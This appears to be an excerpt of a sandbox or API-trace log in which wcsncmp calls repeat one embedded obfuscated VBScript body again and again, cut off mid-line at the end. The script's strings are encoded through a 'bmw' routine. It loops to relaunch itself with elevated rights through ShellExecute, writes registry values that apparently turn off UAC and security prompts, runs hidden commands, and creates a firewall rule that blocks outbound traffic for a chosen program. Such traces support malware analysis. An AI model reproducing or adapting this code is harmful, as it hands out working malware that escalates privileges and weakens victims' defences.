bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.972] wcsncmp (_String1="\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0222.972] wcsncmp (_String1="\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.972] wcsncmp (_String1="End Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.973] wcsncmp (_String1="nd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.973] wcsncmp (_String1="d Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = 